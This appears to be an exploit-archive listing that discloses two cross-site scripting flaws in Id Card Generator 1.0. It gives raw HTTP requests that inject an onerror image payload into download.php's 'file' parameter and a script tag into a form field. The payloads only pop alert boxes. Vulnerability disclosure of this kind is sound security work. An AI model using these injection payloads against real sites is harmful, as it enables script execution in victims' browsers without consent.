Id Card Generator 1.0 Cross Site Scripting

Id Card Generator 1.0 Cross Site Scripting: Posted Mar 28, 2021; Authored by Richard Jones; Id Card Generator version 1.0 suffers from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 666e78b300e1a151c8982d3f2431665678bd06e5c082424c6516b72d0161988b; Download | Favorite | View

Id Card Generator 1.0 Cross Site Scripting

# Exploit Title: Id Card Generator | Cross Site Scripting 'download.php'
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/12040/id-generator-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12040&title=ID+Generator+in+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

GET /id-card/download.php?file=%22%3E%3Cimg%20src=x%20onerror=%22confirm(%27XSS%27)%22%3E HTTP/1.1

Host: TARGET

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://TARGET/id-card/download.php?file=%22%3E%3Cimg%20src=x%20onerror=%22confirm(%27XSS%27)%22%3E

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0


## Payload: "><img src=x onerror="confirm('XSS')">

-------

# Exploit Title: Id Card Generator | Cross Site Scripting 
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/12040/id-generator-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12040&title=ID+Generator+in+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /id-card/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11277759132085478021703975389
Content-Length: 466
Origin: http://localhost
Connection: close
Referer: http://localhost/id-card/
Upgrade-Insecure-Requests: 1

-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="visitornewm"

hello"><script>alert(`xss`)</script>
-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="dateinput"

March 03, 2021
-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="process"

Generate ID
-----------------------------11277759132085478021703975389--

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Id Card Generator 1.0 Cross Site Scripting

Id Card Generator 1.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Id Card Generator 1.0 Cross Site Scripting

Share This

Id Card Generator 1.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems